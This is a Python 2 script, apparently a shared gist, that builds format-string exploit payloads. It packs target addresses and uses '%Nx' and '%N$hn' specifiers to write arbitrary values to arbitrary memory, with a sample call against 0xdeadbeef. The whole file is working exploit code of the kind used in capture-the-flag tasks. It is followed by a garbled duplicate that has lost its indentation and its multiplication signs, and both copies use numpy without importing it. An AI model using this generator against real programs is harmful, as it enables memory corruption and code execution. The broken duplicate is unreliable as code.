hhc0null/fsb_overwrite.py

## fsb_overwrite.py
#!/usr/bin/env python2

import collections
import re
import struct

def fsb_overwrite(index, pairs):
    # convert pairs of address and value to the dataset
    dataset = dict()
    for address, value in pairs:
        x, y = struct.unpack("<HH", struct.pack("<I", value))
        if x not in dataset.keys():
            dataset[x] = set()
        dataset[x].add(address)
        if y not in dataset.keys():
            dataset[y] = set()
        dataset[y].add(address+2)
    dataset = collections.OrderedDict(sorted(dataset.iteritems()))

    # prepare an address part
    addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
    addresses = struct.pack("<"+"I"*len(addresses), *addresses)
    mark = addresses[-4:]

    # prepare format part
    count = 1
    while True:
        formats, previous = "", 0
        for value in dataset.iterkeys():
            if value != 0:
                formats += "%{}x".format(value-previous)
            formats += "%{}$hn".format('#'*count)*len(dataset[value])
            previous = value
        padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
        index_format_ends = index + (formats+padding+addresses).index(mark)/4
        digit = int(numpy.log10(index_format_ends)) + 1
        if count == digit:
            break
        count += 1
    rgx = re.compile("#"*count)
    index_format_begins = index_format_ends - len(addresses)/4 + 1

    # replace substitutions with index of each address
    original_formats_length = len(formats)
    substitution = re.search(rgx, formats)
    while substitution:
        start, end = substitution.start(), substitution.end()
        formats = formats[:start]+str(index_format_begins)+formats[end:]
        index_format_begins += 1
        substitution = re.search(rgx, formats)
    padding += "P"*(original_formats_length-len(formats))

    # finally, generate the payload
    payload = formats + padding + addresses

    return payload

payload = fsb_overwrite(4, (
        (0xdeadbeef, 114514),
    ))
print repr(payload)
	#!/usr/bin/env python2

	import collections
	import re
	import struct

	def fsb_overwrite(index, pairs):
	# convert pairs of address and value to the dataset
	dataset = dict()
	for address, value in pairs:
	x, y = struct.unpack("<HH", struct.pack("<I", value))
	if x not in dataset.keys():
	dataset[x] = set()
	dataset[x].add(address)
	if y not in dataset.keys():
	dataset[y] = set()
	dataset[y].add(address+2)
	dataset = collections.OrderedDict(sorted(dataset.iteritems()))

	# prepare an address part
	addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
	addresses = struct.pack("<"+"I"len(addresses), addresses)
	mark = addresses[-4:]

	# prepare format part
	count = 1
	while True:
	formats, previous = "", 0
	for value in dataset.iterkeys():
	if value != 0:
	formats += "%{}x".format(value-previous)
	formats += "%{}$hn".format('#'count)len(dataset[value])
	previous = value
	padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
	index_format_ends = index + (formats+padding+addresses).index(mark)/4
	digit = int(numpy.log10(index_format_ends)) + 1
	if count == digit:
	break
	count += 1
	rgx = re.compile("#"*count)
	index_format_begins = index_format_ends - len(addresses)/4 + 1

	# replace substitutions with index of each address
	original_formats_length = len(formats)
	substitution = re.search(rgx, formats)
	while substitution:
	start, end = substitution.start(), substitution.end()
	formats = formats[:start]+str(index_format_begins)+formats[end:]
	index_format_begins += 1
	substitution = re.search(rgx, formats)
	padding += "P"*(original_formats_length-len(formats))

	# finally, generate the payload
	payload = formats + padding + addresses

	return payload

	payload = fsb_overwrite(4, (
	(0xdeadbeef, 114514),
	))
	print repr(payload)